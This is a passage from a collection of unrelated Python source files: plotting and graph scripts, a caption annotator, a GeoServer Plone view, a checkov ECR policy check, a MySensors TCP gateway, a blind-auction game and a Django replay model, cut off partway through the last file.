title=delimiter.join(titlelist)\n plt.savefig(title, format='eps', dpi=600)\n plt.show()\n\n\n\nldata, sdata = init(istep)\nhist(sdata, norm_const, small_label)\nvisuliz(istep, sdata, norm_const, 100)\n\n\nhist(ldata, norm_const, large_label)\nvisuliz(istep, ldata, norm_const, 20)\n\n\nh5file.close()\n","sub_path":"MHD_histo.py","file_name":"MHD_histo.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426891509","text":"\"\"\"\nrequires graphviz + pygraphvix to be installed\n\n\"\"\"\n\n\ntry:\n import numpy as np\n import networkx as nx\n from networkx import graphviz_layout\n import matplotlib.pyplot as plt\n import matplotlib.colors as col\n import matplotlib.cm as cmx \nexcept ImportError:\n raise ImportError(\"Req numpy, networkx, Graphviz and either PyGraphviz or Pydot\")\n\n# go\ndata = np.reshape(np.random.random(size=1000), (100, 10))\nadjMat = np.corrcoef(data)\n\nadjMat[adjMat <= 0.5] = 0\n\ngraph = nx.Graph(adjMat)\n\n# find distance from node 0\npath = nx.shortest_path_length(graph, 0)\n\n# set positions of nodes with graphviz\npos = graphviz_layout(graph, prog='twopi',\n args='') # prog = [‘neato’|’dot’|’twopi’|’circo’|’fdp’|’nop’]\n\n# set the color of each edge by its weight\nnCol = range(graph.number_of_edges())\nedges = [(u,v) for (u,v,d) in graph.edges(data=True)]\n\nweights = []\nfor i in range(len(edges)):\n tmp = graph.edge[edges[i][0]][edges[i][1]]['weight']\n weights.append(tmp)\n\ncmap = plt.get_cmap('YlGnBu')\nnorm = col.Normalize(vmin=0, \n\t vmax=1)\nscalarMap = cmx.ScalarMappable(norm=norm, \n\t cmap=cmap)\ncolorList = []\nfor i in range(len(nCol)):\n tmp = scalarMap.to_rgba(weights[i])\n colorList.append(tmp)\n\n# draw the graph: dark blues are stronger weights\nnx.draw(graph, pos, node_color='#A0CBE2', \n edge_color=colorList,\n node_size=100, \n width=2, \n edge_cmap=plt.cm.YlGnBu, \n with_labels=False)\n\n# and dark reds are closer to origin node\nnx.draw_networkx_nodes(graph, pos, nodelist=path.keys(),\n node_size=150,\n node_color=path.values(),\n 
cmap=plt.cm.Reds_r)\n\nplt.show()","sub_path":"rough/networkx_test_circularTree_plot.py","file_name":"networkx_test_circularTree_plot.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534729682","text":"from PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport tensorflow as tf\n#from scnn_test import *\n\ndef pil2arr(imfile):\n path = '../data/Flicker8k_Dataset/'\n # load the image and return\n im = Image.open(path+imfile)\n #im_data_seq = im.getdata()\n #print(np.array(im_data_seq).shape)\n #im_data_arr = np.array(im_data_seq, dtype=float).reshape(im.size[0], im.size[1], 3)\n im_data_arr = np.array(im)\n #print(im.size)\n #print(im_data_arr.shape)\n #im.show()\n return im_data_arr\n\ndef read_file_list(n):\n # Read a dict from index to filename for both image and caption\n file_info = '../data/flickr_audio/wav2capt.txt'\n files_sp = []\n files_im = []\n with open(file_info, 'r') as f:\n for i in range(n):\n files = f.readline()\n files_part = files.split()\n cur_sp = files_part[0]\n cur_im = files_part[1]\n #print(cur_sp, cur_im)\n files_sp.append(cur_sp)\n files_im.append(cur_im)\n #print(cur_im[125:129])\n return files_sp, files_im\n\ndef read_captions(captfiles):\n # Read a dict from image file to its text caption\n file_info = '../data/Flickr8k_text/Flickr8k.token.txt'\n text_capts = {}\n with open(file_info, 'r') as f:\n while len(f.readline()) > 0:\n files = f.readline()\n files_part = files.split()\n nparts = len(files_part)\n cur_sp_parts = files_part[0].split('#')\n cur_sp = cur_sp_parts[0]\n #print(len(cur_sp))\n textcap = ''\n for k in range(nparts-1):\n textcap = textcap+files_part[k+1]+' '\n #print(textcap)\n text_capts[cur_sp] = textcap\n return text_capts\n\ndef annotate(imids):\n # Get the top n caption indices of the current image.\n #scnn_test(captions, images, n)\n data = np.load('top_indices_ann.npz')\n top_ids = data['arr_0']\n [n, ndata] = top_ids.shape\n nim = imids.shape[0]\n files_sp, files_im = read_file_list(ndata)\n text_capts = read_captions(files_im)\n # Transpose to size n x ndata if the dimension of the list is fliped \n if n > ndata:\n top_ids = np.transpose(top_ids)\n [n, ndata] = top_ids.shape\n \n # Find the images for the caption and plot it\n for i in range(nim):\n #right = (np.amin(np.abs(top_ids[:, i]-i)) == 0)\n cur_capts = []\n # If the image is correctly retrieved, show it and the rest associated with the queried caption\n #if right:\n #print('Top indices', top_ids[:, imids[i]])\n for j in range(n):\n cur_im_idx = int(top_ids[j, imids[i]])\n cur_name_im = files_im[cur_im_idx]\n cur_name_sp = files_sp[i]\n #print('Line 217 the image', cur_name_im, 'is related to the caption', cur_name_sp)\n curcapt = text_capts[cur_name_im]\n cur_capts.append(curcapt)\n #cur_im = pil2arr(cur_name_im)\n # Merge the image side-by-side\n #np.concatenate((cur_ims, cur_im), axis=1)\n # Print the captions\n print(curcapt)\n print('\\n')\n # Print the current image\n plt.figure()\n right_im_name = files_im[imids[i]]\n cur_im_arr = pil2arr(right_im_name)\n plt.imshow(cur_im_arr)\n plt.axis('off')\n plt.show()\n\ngood_ids = []\ndata = np.load('top_indices_ann.npz')\ntop_ids = data['arr_0']\nndata = top_ids.shape[1]\nfor i in range(ndata):\n if not np.amin(np.abs(top_ids[:, i]-i)):\n good_ids.append(i)\n\ngood_ids = 
np.array(good_ids)\nannotate(good_ids)","sub_path":"speech2image/SemEmbedding/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560071263","text":"#!/usr/bin/env python3\n\nfrom bucket_test import TestType, BucketTest\n\n\ndef main():\n    bucket_test = BucketTest(\n        test_type=TestType.ABTESTING,\n        y_axis=\"CTR\",\n        category_name=\"design\",\n        filter_name=\"device\",\n        categories={\n            'A': ['10303394', '03948402', '30495043', '30495906'],\n            'B': ['04342343', '64748877', '33677675', '98657939'],\n        },\n        x_axis=\"date\",\n    )\n\n    bucket_test.render()\n\n    bucket_test.compute_pvalues()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507082951","text":"from Products.Five import BrowserView\n\nfrom collective.geo.kml.interfaces import IKMLOpenLayersView\nfrom zope.interface import implements\n\nfrom collective.geo.geoserver.interfaces import IGeoServer\nfrom zope.component import getUtility\n\nimport types\nfrom DateTime import DateTime\nfrom DateTime.interfaces import DateTimeError\n\nfrom collective.geo.geoserver.config import FORM_PREFIX\n\nclass GeoQueryView(BrowserView):\n    \"\"\" GeoQuery default view \"\"\"\n\n    implements(IKMLOpenLayersView)\n\n    undef='--'\n    formpp=FORM_PREFIX\n\n    def drange(self,start, stop, step):\n        r = start\n        while r < stop - step:\n            n = r + step \n            yield r,n\n            r = n\n    \n    def f_label(self,k):\n        return k.replace('_',' ').capitalize()\n    \n    def f_id(self,k,prefix=''):\n        return '%s%s%s'%(self.formpp,prefix,k.replace(' ','_').lower())\n    \n    def eval_single_type(self,el): \n        tp=type(el)\n        if tp in [types.UnicodeType,types.StringType]: \n            try:\n                dt=DateTime(el)\n                tp=DateTime\n            except DateTimeError:\n                pass\n        \n        return tp\n    \n    def eval_list_type(self,vect):\n        return set([self.eval_single_type(i) for i in vect])\n    \n    def f_val_ident(self,v):\n        return dict(lab=v,val=v)\n\n    def f_val_str(self,v):\n        return dict(lab=self.f_label(v),val=v)\n\n    def f_val_range(self,b,t):\n        return dict(lab='%s < x < %s'%(b,t),val='%s_%s'%(b,t))\n\n    def f_val_drange(self,b,t):\n        return dict(lab=b,val='%s_%s'%(b,t))\n    \n    def check_in(self,b,t,vect):\n        return len([v for v in vect if b < v < t])>0\n\n    def check_in_date(self,b,t,vect):\n        return len([v for v in vect if b < DateTime(v) < t])>0 \n\n    def f_vals(self,vect): \n        tps=self.eval_list_type(vect) \n        prefix='eq_'\n        if len(tps)==1:\n            #the list has same type for all elements \n            tp=tps.pop()\n            if tp in [types.UnicodeType,types.StringType]:\n                res=[self.f_val_str(v) for v in vect]\n                prefix='eq_'\n            elif tp in [types.FloatType,]:\n                mx=max(vect)\n                rmx=round(mx)\n                if rmx<mx:\n                    rmx+=1\n                mn=min(vect)\n                rmn=round(mn)\n                if rmn>mn:\n                    rmn-=1 \n                res=[self.f_val_range(b,t) for b,t in self.drange(rmn,rmx,(rmx-rmn)/10) if self.check_in(b,t,vect)]\n                prefix='in_'\n            elif tp is DateTime: \n                mx=DateTime((DateTime(max(vect))+1).Date())\n                mn=DateTime(DateTime(min(vect)).Date()) \n                res=[self.f_val_drange(b.Date(),t.Date()) for b,t in self.drange(mn,mx+1,1) if self.check_in_date(b,t,vect)]\n                prefix='in_'\n            else: \n                res=[self.f_val_ident(v) for v in vect]\n        else:\n            #cannot format \n            res=[self.f_val_ident(v) for v in vect]\n        \n        return prefix,[self.f_val_ident(self.undef),]+res\n    \n    def gen_select(self,k,v):\n        prefix,vals=self.f_vals(v)\n        id=self.f_id(k,prefix=prefix)\n        return dict(label=self.f_label(k),\n                id=id,\n                vals=vals,\n                
selected=self.request.get(id,self.undef))\n\n def get_available_menus(self):\n ut=getUtility(IGeoServer)\n datas=ut.getDatas(self.context.getLayer()) \n return [self.gen_select(k,v) for k,v in datas.items()]\n\n def __call__(self): \n for k,v in self.request.items():\n if self.formpp in k:\n if v==self.undef:\n #reset value\n try:\n self.request.SESSION.delete(k)\n except KeyError:\n pass\n else:\n self.request.SESSION.set(k,v)\n \n for k in self.request.SESSION.keys():\n if self.formpp in k and self.request.get(k,None) is None:\n self.request.SESSION.delete(k)\n \n return super(GeoQueryView,self).__call__()\n\n\nclass KMLDocument(BrowserView):\n formpp=FORM_PREFIX\n \n def mk_filter(self,ut,k,v):\n div='_'\n parts=k.split(div)\n #filter type\n f=parts[1]\n \n col_name=div.join(parts[2:])\n \n ff=None\n if f=='eq':\n ff=ut.fun_cql_eq(col_name,v)\n elif f=='in':\n ff=ut.fun_cql_in(col_name,v.split('_'))\n \n return ff\n \n def __call__(self):\n ut=getUtility(IGeoServer)\n ss_filters=[]\n \n cql_user_filter=self.context.getCqlfilter().strip()\n if cql_user_filter is not None and len(cql_user_filter)>0:\n ss_filters.append(cql_user_filter)\n \n for k,v in self.request.SESSION.items():\n if self.formpp in k:\n filt=self.mk_filter(ut,k,v) \n if filt is not None:\n ss_filters.append(filt)\n self.request.SESSION.delete(k)\n \n self.request.response.setHeader('Content-Type', '%s;charset=utf-8'%ut.getFormat())\n return ut.getMap(self.context.getLayer(),\n self.context.getSrid(),\n ut.buildCqlFilterByRequest(ss_filters))\n\n\n\n\n \n","sub_path":"src/collective/geo/geoserver/browser/geoquery_view.py","file_name":"geoquery_view.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161616971","text":"#!/usr/bin/python\n#\n# Copyright 2013 Red Hat\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# Reads in a list of exclude regular expressions from a file and outputs a\n# regex suitable to be passed into testr\n\nimport sys\n\nre = []\nwith open(sys.argv[1]) as fp:\n for line in fp:\n line = line.strip()\n if not line or line[0] == '#':\n continue\n re.append(line)\nprint(\"^(?!(%s))\" % \"|\".join(re))\n","sub_path":"elements/tempest/tests2skip.py","file_name":"tests2skip.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519757152","text":"from checkov.common.models.enums import CheckResult, CheckCategories\nfrom checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck\n\n\nclass ECRPolicy(BaseResourceCheck):\n def __init__(self):\n name = \"Ensure ECR policy is not set to public\"\n id = \"CKV_AWS_32\"\n supported_resources = ['AWS::ECR::Repository']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)\n\n def scan_resource_conf(self, conf):\n \"\"\"\n Looks for public * policy for ecr repository:\n https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-ecr-repository.html\n :param conf: aws_ecr_repository configuration\n :return: \n \"\"\"\n if 'Properties' in conf.keys():\n if 'RepositoryPolicyText' in conf['Properties'].keys():\n if 'Statement' in conf['Properties']['RepositoryPolicyText'].keys():\n for statement in conf['Properties']['RepositoryPolicyText']['Statement']:\n if 'Principal' in statement.keys():\n for principal in statement['Principal']:\n if principal == \"*\":\n return CheckResult.FAILED\n return CheckResult.PASSED\n\n\ncheck = ECRPolicy()\n","sub_path":"checkov/cloudformation/checks/resource/aws/ECRPolicy.py","file_name":"ECRPolicy.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71984893","text":"import argparse\nimport glob\n\nimport os\n\nfrom util.util import copy_file\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--first_images_folder\", required=True, help=\"Path to the first folder of images\")\nap.add_argument(\"-s\", \"--second_images_folder\", required=True, help=\"Path to the second folder of images \")\nap.add_argument(\"-d\", \"--result_destination\", required=True, help=\"Path to the folder in which save the result\")\nargs = vars(ap.parse_args())\n\n# build a dict where key is an image name and value is a full path to that image\ndef build_dict(images_folder):\n d = {}\n for image_path in glob.glob(os.path.join(images_folder, \"*\")):\n key = image_path.rsplit(os.sep, 1)[-1]\n value = image_path\n d[key] = value\n return d\n\n\nf = build_dict(args[\"first_images_folder\"])\ns = build_dict(args[\"second_images_folder\"])\n\nf_keys = set(f.keys())\ns_keys = set(s.keys())\n\n# find difference\ndiff = f_keys - s_keys\n\n\nfor key in diff:\n copy_file(f[key], os.path.join(args[\"result_destination\"], key))\n","sub_path":"util/find_relative_complement.py","file_name":"find_relative_complement.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65600751","text":"\"\"\"Implement a TCP gateway.\"\"\"\nimport asyncio\nimport 
ipaddress\nimport logging\nimport select\nimport socket\nimport threading\nimport time\n\nimport serial.threaded\nfrom getmac import get_mac_address\n\nfrom mysensors import (BaseAsyncGateway, BaseMySensorsProtocol,\n BaseTransportGateway, Message, ThreadingGateway)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BaseTCPGateway(BaseTransportGateway):\n \"\"\"MySensors base TCP gateway.\"\"\"\n\n # pylint: disable=abstract-method\n\n def __init__(self, host, port=5003, **kwargs):\n \"\"\"Set up base TCP gateway.\"\"\"\n super().__init__(**kwargs)\n self.server_address = (host, port)\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n self.const.Internal.I_VERSION.set_handler(\n self.handlers, self._handle_i_version)\n\n def _check_connection(self):\n \"\"\"Check if connection is alive every reconnect_timeout seconds.\"\"\"\n if ((self.tcp_disconnect_timer + 2 * self.reconnect_timeout) <\n time.time()):\n self.tcp_disconnect_timer = time.time()\n raise OSError('No response from {}. Disconnecting'.format(\n self.server_address))\n if (self.tcp_check_timer + self.reconnect_timeout) >= time.time():\n return\n msg = Message().copy(\n child_id=255, type=self.const.MessageType.internal,\n sub_type=self.const.Internal.I_VERSION)\n self.add_job(msg.encode)\n self.tcp_check_timer = time.time()\n\n def _handle_i_version(self, msg): # pylint: disable=useless-return\n # pylint: disable=unused-argument\n self.tcp_disconnect_timer = time.time()\n return None\n\n def get_gateway_id(self):\n \"\"\"Return a unique id for the gateway.\"\"\"\n host, _ = self.server_address\n try:\n ip_address = ipaddress.ip_address(host)\n except ValueError:\n # Only hosts using ip address supports unique id.\n return None\n if ip_address.version == 6:\n mac = get_mac_address(ip6=host)\n else:\n mac = get_mac_address(ip=host)\n return mac\n\n\nclass TCPGateway(BaseTCPGateway, ThreadingGateway):\n \"\"\"MySensors TCP gateway.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Set up TCP gateway.\"\"\"\n super().__init__(*args, **kwargs)\n self.protocol = BaseMySensorsProtocol(self, self.start)\n\n def _connect(self):\n \"\"\"Connect to socket. 
This should be run in a new thread.\"\"\"\n while self.protocol:\n _LOGGER.info('Trying to connect to %s', self.server_address)\n try:\n sock = socket.create_connection(\n self.server_address, self.reconnect_timeout)\n except socket.timeout:\n _LOGGER.error(\n 'Connecting to socket timed out for %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n time.sleep(self.reconnect_timeout)\n except OSError:\n _LOGGER.error(\n 'Failed to connect to socket at %s', self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n time.sleep(self.reconnect_timeout)\n else:\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n transport = TCPTransport(\n sock, lambda: self.protocol, self._check_connection)\n poll_thread = threading.Thread(target=self._poll_queue)\n self._stop_event.clear()\n poll_thread.start()\n transport.start()\n transport.connect()\n return\n\n def stop(self):\n \"\"\"Stop the gateway.\"\"\"\n _LOGGER.info('Stopping gateway')\n self._disconnect()\n super().stop()\n\n\nclass AsyncTCPGateway(BaseTCPGateway, BaseAsyncGateway):\n \"\"\"MySensors async TCP gateway.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Set up async TCP gateway.\"\"\"\n self.cancel_check_conn = None\n protocol = AsyncTCPMySensorsProtocol\n super().__init__(*args, protocol=protocol, **kwargs)\n\n @asyncio.coroutine\n def _connect(self):\n \"\"\"Connect to the socket.\"\"\"\n try:\n while True:\n _LOGGER.info('Trying to connect to %s', self.server_address)\n try:\n yield from asyncio.wait_for(\n self.loop.create_connection(\n lambda: self.protocol, *self.server_address),\n self.reconnect_timeout, loop=self.loop)\n self.tcp_check_timer = time.time()\n self.tcp_disconnect_timer = time.time()\n self._check_connection()\n return\n except asyncio.TimeoutError:\n _LOGGER.error(\n 'Connecting to socket timed out for %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n yield from asyncio.sleep(\n self.reconnect_timeout, loop=self.loop)\n except OSError:\n _LOGGER.error(\n 'Failed to connect to socket at %s',\n self.server_address)\n _LOGGER.info(\n 'Waiting %s secs before trying to connect again',\n self.reconnect_timeout)\n yield from asyncio.sleep(\n self.reconnect_timeout, loop=self.loop)\n except asyncio.CancelledError:\n _LOGGER.debug(\n 'Connect attempt to %s cancelled', self.server_address)\n\n def _check_connection(self):\n \"\"\"Check if connection is alive every reconnect_timeout seconds.\"\"\"\n try:\n super()._check_connection()\n except OSError as exc:\n _LOGGER.error(exc)\n self.protocol.transport.close()\n self.protocol.conn_lost_callback()\n return\n task = self.loop.call_later(\n self.reconnect_timeout + 0.1, self._check_connection)\n self.cancel_check_conn = task.cancel\n\n @asyncio.coroutine\n def get_gateway_id(self):\n \"\"\"Return a unique id for the gateway.\"\"\"\n mac = yield from self.loop.run_in_executor(\n None, super().get_gateway_id)\n return mac\n\n\nclass AsyncTCPMySensorsProtocol(BaseMySensorsProtocol, asyncio.Protocol):\n \"\"\"Async TCP protocol class.\"\"\"\n\n def connection_lost(self, exc):\n \"\"\"Handle lost connection.\"\"\"\n _LOGGER.debug('Connection lost with %s', self.transport)\n if self.gateway.cancel_check_conn:\n self.gateway.cancel_check_conn()\n self.gateway.cancel_check_conn = None\n if exc:\n _LOGGER.error(exc)\n self.conn_lost_callback()\n 
self.transport = None\n\n\nclass TCPTransport(serial.threaded.ReaderThread):\n \"\"\"Transport for TCP gateway.\"\"\"\n\n def __init__(self, sock, protocol_factory, check_conn):\n \"\"\"Set up transport.\"\"\"\n super().__init__(sock, protocol_factory)\n self.sock = sock\n # make socket non blocking\n self.sock.setblocking(False)\n self._check_connection = check_conn\n\n def _check_socket(self, timeout=None):\n \"\"\"Check if socket is readable/writable.\"\"\"\n sock = self.sock\n available_socks = select.select([sock], [sock], [sock], timeout)\n if available_socks[2]:\n raise OSError\n return available_socks\n\n def write(self, data):\n \"\"\"Write data to the socket.\"\"\"\n with self._lock:\n self.sock.sendall(data)\n\n def run(self):\n \"\"\"Transport thread loop.\"\"\"\n # pylint: disable=broad-except\n self.protocol = self.protocol_factory()\n try:\n self.protocol.connection_made(self)\n except Exception as exc:\n self.alive = False\n self.protocol.connection_lost(exc)\n self._connection_made.set()\n return\n error = None\n self._connection_made.set()\n while self.alive:\n data = None\n try:\n available_socks = self._check_socket()\n if available_socks[0]:\n data = self.sock.recv(120)\n except Exception as exc:\n error = exc\n break\n else:\n if data:\n try:\n self.protocol.data_received(data)\n except Exception as exc:\n error = exc\n break\n try:\n self._check_connection()\n except OSError as exc:\n error = exc\n break\n time.sleep(0.02) # short sleep to avoid burning 100% cpu\n self.alive = False\n self.protocol.connection_lost(error)\n self.protocol = None\n","sub_path":"mysensors/gateway_tcp.py","file_name":"gateway_tcp.py","file_ext":"py","file_size_in_byte":9366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178535874","text":"from replit import clear\r\n\r\nimport art\r\n\r\nbids = {}\r\n\r\ndef highest_bid(bidding_record):\r\n highest_bid_amount = 0\r\n for bidder in bidding_record:\r\n bidding_amount = bidding_record[bidder]\r\n if bidding_amount > highest_bid_amount:\r\n highest_bid_amount = bidding_amount\r\n winner = bidder\r\n print(f\"The winner is {winner} with a bid of ${highest_bid_amount}\")\r\n \r\nprint(art.logo)\r\n\r\nprint(\"Welcome to the secret auction program!\")\r\n\r\nanother_bidder = True\r\nwhile another_bidder is True:\r\n name = input(\"What is your name?: \")\r\n bid_amount = int(input(\"What's your bid?: $\"))\r\n bids[name] = bid_amount\r\n want_to_add = input(\"Are there any other bidders? Type 'Yes' or 'No' \").lower()\r\n if want_to_add == \"no\":\r\n another_bidder = False\r\n highest_bid(bids)\r\n elif want_to_add == \"yes\":\r\n clear()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"8. Blind Auction/8. Blind Auction.py","file_name":"8. 
Blind Auction.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188727147","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import now\n\nfrom replay_parser import ReplayParser\n\nimport chardet\nfrom datetime import datetime\nimport re\nimport struct\nimport time\n\n\nclass Map(models.Model):\n\n title = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n slug = models.CharField(\n max_length=100,\n )\n\n image = models.FileField(\n upload_to='uploads/files',\n blank=True,\n null=True,\n )\n\n def __unicode__(self):\n return self.title or self.slug\n\n class Meta:\n ordering = ['title']\n\n\nclass Replay(models.Model):\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n blank=True,\n null=True,\n db_index=True,\n )\n\n title = models.CharField(\n \"replay name\",\n max_length=32,\n blank=True,\n null=True,\n )\n\n file = models.FileField(\n upload_to='uploads/replay_files',\n )\n\n replay_id = models.CharField(\n \"replay ID\",\n max_length=100,\n blank=True,\n null=True,\n )\n\n player_name = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n player_team = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n map = models.ForeignKey(\n Map,\n blank=True,\n null=True,\n db_index=True,\n )\n\n server_name = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n )\n\n timestamp = models.DateTimeField(\n blank=True,\n null=True,\n )\n\n team_sizes = models.PositiveIntegerField(\n blank=True,\n null=True,\n db_index=True,\n )\n\n team_0_score = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n team_1_score = models.IntegerField(\n default=0,\n blank=True,\n null=True,\n )\n\n match_type = models.CharField(\n max_length=7,\n blank=True,\n null=True,\n )\n\n # Parser V2 values.\n keyframe_delay = models.FloatField(\n blank=True,\n null=True,\n )\n\n max_channels = models.IntegerField(\n default=1023,\n blank=True,\n null=True,\n )\n\n max_replay_size_mb = models.IntegerField(\n \"max replay size (MB)\",\n default=10,\n blank=True,\n null=True,\n )\n\n num_frames = models.IntegerField(\n blank=True,\n null=True,\n )\n\n record_fps = models.FloatField(\n \"record FPS\",\n default=30.0,\n blank=True,\n null=True,\n )\n\n excitement_factor = models.FloatField(\n default=0.00,\n )\n\n show_leaderboard = models.BooleanField(\n default=False,\n )\n\n processed = models.BooleanField(\n default=False,\n )\n\n def team_x_player_list(self, team):\n return [\n u\"{}{}\".format(\n player.player_name,\n \" ({})\".format(player.goal_set.count()) if player.goal_set.count() > 0 else '',\n ) for player in self.player_set.filter(\n team=team,\n )\n ]\n\n def team_x_players(self, team):\n return ', '.join(self.team_x_player_list(team))\n\n def team_0_players(self):\n return self.team_x_players(0)\n\n def team_1_players(self):\n return self.team_x_players(1)\n\n def team_0_player_list(self):\n return self.team_x_player_list(0)\n\n def team_1_player_list(self):\n return self.team_x_player_list(1)\n\n def player_pairs(self):\n return map(None, self.team_0_player_list(), self.team_1_player_list())\n\n def region(self):\n if not self.server_name:\n return 'N/A'\n\n match = re.search(settings.SERVER_REGEX, self.server_name).groups()\n return 
match[1]\n\n def lag_report_url(self):\n base_url = 'https://psyonixhr.wufoo.com/forms/game-server-performance-report'\n if not self.server_name:\n return base_url\n\n # Split out the server name.\n match = re.search(r'(EU|USE|USW|OCE|SAM)(\\d+)(-([A-Z][a-z]+))?', self.server_name).groups()\n\n return \"{}/def/field1={}&field2={}&field13={}\".format(\n base_url,\n *match\n )\n\n def match_length(self):\n if not self.num_frames or not self.record_fps:\n return 'N/A'\n\n calculation = self.num_frames / self.record_fps\n minutes, seconds = divmod(calculation, 60)\n return '%d:%02d' % (\n int(minutes),\n int(seconds),\n )\n\n def calculate_excitement_factor(self):\n # Multiplers for use in factor tweaking.\n swing_rating_multiplier = 8\n goal_count_multiplier = 1.2\n\n # Calculate how the swing changed throughout the game.\n swing = 0\n swing_values = []\n\n for goal in self.goal_set.all():\n if goal.player.team == 0:\n swing -= 1\n else:\n swing += 1\n\n swing_values.append(swing)\n\n if self.team_0_score > self.team_1_score:\n # Team 0 won, but were they ever losing?\n deficit_values = filter(lambda x: x > 0, swing_values)\n\n if deficit_values:\n deficit = max(swing_values)\n else:\n deficit = 0\n\n score_min_def = self.team_0_score - deficit\n else:\n # Team 1 won, but were they ever losing?\n deficit_values = filter(lambda x: x < 0, swing_values)\n\n if deficit_values:\n deficit = abs(min(deficit_values))\n else:\n deficit = 0\n\n score_min_def = self.team_1_score - deficit\n\n if score_min_def != 0:\n swing_rating = float(deficit) / score_min_def * swing_rating_multiplier\n else:\n swing_rating = 0\n\n # Now we have the swing rating, adjust it by the total number of goals.\n # This gives us a \"base value\" for each replay and allows replays with\n # lots of goals but not much swing to get reasonable rating.\n swing_rating += (self.team_0_score + self.team_1_score) * goal_count_multiplier\n\n # Decay the score based on the number of days since the game was played.\n # This should keep the replay list fresh. Cap at a set number of days.\n days_ago = (now().date() - self.timestamp.date()).days\n\n day_cap = 75\n\n if days_ago > day_cap:\n days_ago = day_cap\n\n # Make sure we're not dividing by zero.\n if days_ago > 0:\n days_ago = float(days_ago)\n swing_rating -= swing_rating * days_ago / 100\n\n return swing_rating\n\n def get_absolute_url(self):\n return reverse('replay:detail', kwargs={\n 'pk': self.pk,\n })\n\n class Meta:\n ordering = ['-timestamp', '-pk']\n\n def __str__(self):\n return self.title or str(self.pk) or '[{}] {} {} game on {}. 
Final score: {}, Uploaded by {}.'.format(\n self.timestamp,\n '{size}v{size}'.format(size=self.team_sizes),\n self.match_type,\n self.map,\n '{}-{}'.format(self.team_0_score, self.team_1_score),\n self.player_name,\n )\n\n def clean(self):\n if self.pk:\n return\n\n if self.file:\n # Process the file.\n parser = ReplayParser()\n\n try:\n replay_data = parser.parse(self.file)['header']\n\n # Check if this replay has already been uploaded.\n replay = Replay.objects.filter(\n replay_id=replay_data['Id']\n )\n\n if replay.count() > 0:\n raise ValidationError(mark_safe(\"This replay has already been uploaded, you can view it here.\".format(\n replay[0].get_absolute_url()\n )))\n except struct.error:\n raise ValidationError(\"The file you selected does not seem to be a valid replay file.\")\n\n def save(self, *args, **kwargs):\n super(Replay, self).save(*args, **kwargs)\n\n # Server name\n\n if self.file and not self.processed:\n # Process the file.\n parser = ReplayParser()\n data = parser.parse(self.file)['header']\n\n Goal.objects.filter(\n replay=self,\n frame__isnull=True,\n ).delete()\n\n Player.objects.filter(\n replay=self,\n ).delete()\n\n # If we have a stats table, pull in the data.\n if 'PlayerStats' in data:\n # We can show a leaderboard!\n self.show_leaderboard = True\n\n for player in data['PlayerStats']:\n \"\"\"\n {\n 'OnlineID': 0,\n 'Name': 'Swabbie',\n 'Saves': 0,\n 'Platform': {\n 'OnlinePlatform': 'OnlinePlatform_Unknown'\n },\n 'Score': 115,\n 'Goals': 1,\n 'Shots': 1,\n 'Team': 